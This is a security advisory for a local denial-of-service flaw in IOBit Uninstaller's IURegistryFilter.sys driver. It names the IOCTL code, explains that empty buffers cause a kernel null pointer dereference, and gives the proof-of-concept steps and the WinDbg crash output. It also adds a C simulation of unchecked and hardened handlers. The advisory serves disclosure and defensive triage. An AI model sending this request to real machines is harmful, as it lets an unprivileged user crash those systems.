IOBit Uninstaller DoS Vulnerability

Basic Info

Vendor: IOBit

Software: IOBit Uninstaller

Vulnerable Component: IURegistryFilter.sys

Vuln Type: Null Pointer Dereference

Description:

IURegistryFilter.sys exposes a device object that members of the Everyone group are allowed to open, so any local user can send it requests. Its dispatch routine for IOCTL 0x8001E000 reads from the request's input buffer without first checking that the buffer is present. The control code decodes to device type 0x8001, function 0x800, FILE_READ_ACCESS | FILE_WRITE_ACCESS, METHOD_BUFFERED; for buffered I/O the I/O manager leaves Irp->AssociatedIrp.SystemBuffer NULL when both the input and output lengths are zero, which matches the crash context below (rbp == 0 at `cmp dword ptr [rbp],1`, IURegistryFilter+0x1a23). A low-privileged local attacker can therefore trigger a kernel-mode null pointer dereference and crash the machine (BSOD), a local denial of service.
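
The C program below is an added example, not part of the original advisory and not IURegistryFilter.sys's own code. It decodes 0x8001E000 into its CTL_CODE fields and models the METHOD_BUFFERED handler shape implied by the crash context (a DWORD read at [rbp] with rbp == 0), once without and once with the checks a dispatch routine should perform before touching SystemBuffer. The kernel stand-ins (fake_irp, build_buffered_irp), the simulated status values and the handler names are assumptions made so the code compiles and runs on any host; the driver's real dispatch logic is only inferred from the crash.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not the driver's code). Decodes IOCTL 0x8001E000 and
 * models a METHOD_BUFFERED dispatch handler with and without input
 * validation, using small stand-ins for the kernel structures so it
 * compiles and runs outside the kernel. */

#define IOCTL_UNDER_TEST 0x8001E000u

/* Transfer method lives in the low two bits of a control code (winioctl.h). */
#define METHOD_BUFFERED 0u

typedef struct {
    unsigned device_type;  /* bits 31..16; >= 0x8000 is vendor-defined  */
    unsigned access;       /* bits 15..14; 1 = read, 2 = write, 3 = both */
    unsigned function;     /* bits 13..2;  >= 0x800 is vendor-defined    */
    unsigned method;       /* bits 1..0;   0 = METHOD_BUFFERED           */
} ctl_code_fields;

ctl_code_fields decode_ctl_code(uint32_t code)
{
    ctl_code_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Stand-in for the parts of IRP / IO_STACK_LOCATION a buffered handler
 * uses (assumption: simplified, not ntddk.h). */
typedef struct {
    void    *system_buffer;        /* Irp->AssociatedIrp.SystemBuffer */
    uint32_t input_buffer_length;  /* Parameters.DeviceIoControl.InputBufferLength */
    uint32_t output_buffer_length;
} fake_irp;

/* Simulated NTSTATUS values; SIM_NULL_DEREF stands for "the real driver
 * would have faulted here". */
#define STATUS_SUCCESS           0x00000000u
#define STATUS_INVALID_PARAMETER 0xC000000Du
#define STATUS_BUFFER_TOO_SMALL  0xC0000023u
#define SIM_NULL_DEREF           0xFFFFFFFFu

/* Models the I/O manager's METHOD_BUFFERED behaviour: SystemBuffer is
 * allocated only when max(in_len, out_len) > 0. For a
 * DeviceIoControl(h, code, NULL, 0, NULL, 0, ...) call it stays NULL. */
fake_irp build_buffered_irp(const void *user_in, uint32_t in_len, uint32_t out_len)
{
    static uint8_t pool[64];       /* stand-in for the nonpaged-pool copy */
    fake_irp irp = { NULL, in_len, out_len };
    uint32_t n = in_len > out_len ? in_len : out_len;
    if (n > 0 && n <= sizeof pool) {
        if (in_len > 0)
            memcpy(pool, user_in, in_len);
        irp.system_buffer = pool;
    }
    return irp;
}

/* Unchecked shape implied by the crash: read a DWORD from the buffer and
 * compare it with 1 (cmp dword ptr [rbp],1). The NULL test exists only so
 * this model does not itself crash; it stands for the driver's fault. */
uint32_t handle_e000_unchecked(const fake_irp *irp)
{
    const uint32_t *cmd = irp->system_buffer;
    if (cmd == NULL)
        return SIM_NULL_DEREF;
    return (*cmd == 1u) ? STATUS_SUCCESS : STATUS_INVALID_PARAMETER;
}

/* Hardened shape: check the length and the pointer before reading. */
uint32_t handle_e000_checked(const fake_irp *irp)
{
    if (irp->input_buffer_length < sizeof(uint32_t))
        return STATUS_BUFFER_TOO_SMALL;
    if (irp->system_buffer == NULL)
        return STATUS_INVALID_PARAMETER;
    const uint32_t *cmd = irp->system_buffer;
    return (*cmd == 1u) ? STATUS_SUCCESS : STATUS_INVALID_PARAMETER;
}

int main(void)
{
    ctl_code_fields f = decode_ctl_code(IOCTL_UNDER_TEST);
    printf("0x%08X -> DeviceType=0x%04X Access=%u Function=0x%03X Method=%u%s\n",
           IOCTL_UNDER_TEST, f.device_type, f.access, f.function, f.method,
           f.method == METHOD_BUFFERED ? " (METHOD_BUFFERED)" : "");

    fake_irp empty = build_buffered_irp(NULL, 0, 0);   /* the PoC's request shape */
    printf("NULL/0 buffer: unchecked=0x%08X checked=0x%08X\n",
           handle_e000_unchecked(&empty), handle_e000_checked(&empty));

    uint32_t one = 1;
    fake_irp good = build_buffered_irp(&one, sizeof one, 0);
    printf("valid buffer:  unchecked=0x%08X checked=0x%08X\n",
           handle_e000_unchecked(&good), handle_e000_checked(&good));
    return 0;
}
```

The decode is the point to check first when triaging a driver IOCTL crash: a vendor function number with METHOD_BUFFERED means the user-supplied lengths alone decide whether SystemBuffer exists, so every buffered handler must test InputBufferLength (and the pointer) before the first read. The access bits (3 here) only govern which access rights the handle needs; they are no substitute for a restrictive device DACL.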

Proof Of Concept

Test OS Version: Windows 10, 19041.vb_release.191206-1406

  1. Run poc.exe as a low-privileged user; it sends IOCTL 0x8001E000 to the driver via DeviceIoControl (see poc!main in the stack below).
  2. Windows crashes with a BSOD.

WinDbg output from the resulting crash dump:

CONTEXT:  ffff808cd7675d90 -- (.cxr 0xffff808cd7675d90)
rax=000000008001e014 rbx=0000000000000000 rcx=000000008001e000
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff806743a1a23 rsp=ffff808cd7676790 rbp=0000000000000000
 r8=0000000000000000  r9=ffffd702f3449560 r10=fffff806743a1838
r11=0000000000000000 r12=ffffd702f307f2b0 r13=ffffd702f3449560
r14=0000000000000001 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050246
IURegistryFilter+0x1a23:
fffff806`743a1a23 837d0001        cmp     dword ptr [rbp],1 ss:0018:00000000`00000000=????????
Resetting default scope

PROCESS_NAME:  poc.exe

STACK_TEXT:
ffff808c`d7676790 fffff806`59a49cf5 : 00000000`00000002 00000000`00000000 ffff808c`d7676b80 00000000`00000000 : IURegistryFilter+0x1a23
ffff808c`d76767f0 fffff806`59e592ac : 00000000`00000001 00000000`8001e000 ffffd702`f644e590 00000000`00000000 : nt!IofCallDriver+0x55
ffff808c`d7676830 fffff806`59e58f03 : ffffd702`00000000 ffff808c`d7676b80 00000000`00010000 00000000`8001e000 : nt!IopSynchronousServiceTail+0x34c
ffff808c`d76768d0 fffff806`59e581d6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0xd13
ffff808c`d7676a20 fffff806`59c25235 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`0014edb8 : nt!NtDeviceIoControlFile+0x56
ffff808c`d7676a90 00007ffa`f510d0c4 : 00007ffa`f2b2591b 00000002`0000000c 00007ffa`f50c0101 00000414`596a1df7 : nt!KiSystemServiceCopyEnd+0x25
00000000`0014fdc8 00007ffa`f2b2591b : 00000002`0000000c 00007ffa`f50c0101 00000414`596a1df7 00007ffa`f2fd5985 : ntdll!NtDeviceIoControlFile+0x14
00000000`0014fdd0 00007ffa`f3295921 : 00000000`8001e000 00000000`00000000 00000000`0014fe60 00007ffa`00000000 : KERNELBASE!DeviceIoControl+0x6b
00000000`0014fe40 00007ff7`484e10fc : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!DeviceIoControlImplementation+0x81
00000000`0014fe90 00007ff7`484e1350 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : poc!main+0x8c

Attachment

IURegistryFilter.sys